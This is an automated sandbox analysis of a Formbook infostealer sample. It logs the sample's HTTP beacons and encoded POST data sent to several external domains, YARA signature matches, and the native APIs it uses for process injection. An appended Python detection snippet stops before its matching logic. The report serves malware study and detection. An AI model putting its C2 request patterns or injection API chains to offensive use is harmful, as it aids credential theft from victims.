Source: unknown HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
Source: unknown DNS traffic detected: queries for: www.white-hat.uk
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== HTTP/1.1Host: www.un-object.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud

Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00410331 1_2_00410331
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A408B7 1_2_00A408B7
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A40A3B 1_2_00A40A3B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040C043 3_2_0040C043
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00405873 3_2_00405873
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00401824 3_2_00401824
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00401830 3_2_00401830
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040C03E 3_2_0040C03E
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_004038F3 3_2_004038F3
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00422A4C 3_2_00422A4C
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00401BD0 3_2_00401BD0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00405653 3_2_00405653
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00420753 3_2_00420753
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BB090 3_2_009BB090
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61002 3_2_00A61002
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AF900 3_2_009AF900
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DEBB0 3_2_009DEBB0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B841F 3_2_009B841F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A0D20 3_2_009A0D20
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A71D55 3_2_00A71D55
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C6E30 3_2_009C6E30
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: String function: 00401980 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0041E833 NtAllocateVirtualMemory, 3_2_0041E833
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0041E653 NtCreateFile, 3_2_0041E653
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0041E703 NtReadFile, 3_2_0041E703
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0041E783 NtClose, 3_2_0041E783
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_009E98F0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9840 NtDelayExecution,LdrInitializeThunk, 3_2_009E9840
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_009E9860
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E99A0 NtCreateSection,LdrInitializeThunk, 3_2_009E99A0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_009E9910
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_009E9A00
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9A20 NtResumeThread,LdrInitializeThunk, 3_2_009E9A20
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9A50 NtCreateFile,LdrInitializeThunk, 3_2_009E9A50
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E95D0 NtClose,LdrInitializeThunk, 3_2_009E95D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9540 NtReadFile,LdrInitializeThunk, 3_2_009E9540
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_009E96E0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_009E9660
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_009E9780
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_009E97A0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_009E9FE0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_009E9710
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E98A0 NtWriteVirtualMemory, 3_2_009E98A0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9820 NtEnumerateKey, 3_2_009E9820
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EB040 NtSuspendThread, 3_2_009EB040
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E99D0 NtCreateProcessEx, 3_2_009E99D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9950 NtQueueApcThread, 3_2_009E9950
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9A80 NtOpenDirectoryObject, 3_2_009E9A80
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9A10 NtQuerySection, 3_2_009E9A10
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EA3B0 NtGetContextThread, 3_2_009EA3B0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9B00 NtSetValueKey, 3_2_009E9B00
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E95F0 NtQueryInformationFile, 3_2_009E95F0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EAD30 NtSetContextThread, 3_2_009EAD30
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9520 NtWaitForSingleObject, 3_2_009E9520
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9560 NtWriteFile, 3_2_009E9560
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E96D0 NtCreateKey, 3_2_009E96D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9610 NtEnumerateValueKey, 3_2_009E9610
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9650 NtQueryValueKey, 3_2_009E9650
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9670 NtQueryInformationProcess, 3_2_009E9670
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EA710 NtOpenProcessToken, 3_2_009EA710
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9730 NtQueryVirtualMemory, 3_2_009E9730
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9770 NtSetInformationFile, 3_2_009E9770
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EA770 NtOpenThread, 3_2_009EA770
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9760 NtOpenProcess, 3_2_009E9760
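Added example, not part of the Joe Sandbox report: the native API set resolved by vfpbkeeo.exe above (NtCreateProcessEx, NtWriteVirtualMemory, NtGetContextThread/NtSetContextThread, NtQueueApcThread, NtSuspendThread, NtOpenProcess/NtOpenThread) is exactly the raw material behind the "process hollowing", "queues an APC in another process" and "modifies the context of a thread in another process" signatures. The Python below parses report lines in the "Source: ... Code function: ..." format shown here, collects the APIs seen per process image, and checks them against three injection chains. The stage-to-API table and the chain definitions are my own assumptions, not the sandbox's rules; the sample lines are copied from this report, plus one constructed benign line for contrast.

```python
import re

# One "Code function" line per observed function, in the report's own format:
#   Source: <image> Code function: <id> <Api1>,<Api2>, <id>
LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?) Code function: (?P<fn>\S+) (?P<apis>.+?),? (?P=fn)$"
)

# Injection stage -> API names that implement it (native and Win32 spellings).
# Assumed mapping for this example; extend it for your own tooling.
STAGES = {
    "create":  {"NtCreateProcessEx", "NtCreateUserProcess", "CreateProcessInternalW",
                "CreateProcessW", "CreateProcessA"},
    "open":    {"NtOpenProcess", "NtOpenThread", "OpenProcess", "OpenThread"},
    "write":   {"NtWriteVirtualMemory", "WriteProcessMemory", "NtMapViewOfSection"},
    "suspend": {"NtSuspendThread", "SuspendThread"},
    "context": {"NtGetContextThread", "NtSetContextThread", "GetThreadContext", "SetThreadContext"},
    "apc":     {"NtQueueApcThread", "QueueUserAPC"},
    "resume":  {"NtResumeThread", "ResumeThread"},
}

# Each technique as the minimal set of stages it cannot work without.
CHAINS = {
    "process_hollowing": {"create", "write", "context"},
    "apc_injection":     {"open", "write", "apc"},
    "thread_hijacking":  {"open", "suspend", "context", "write"},
}

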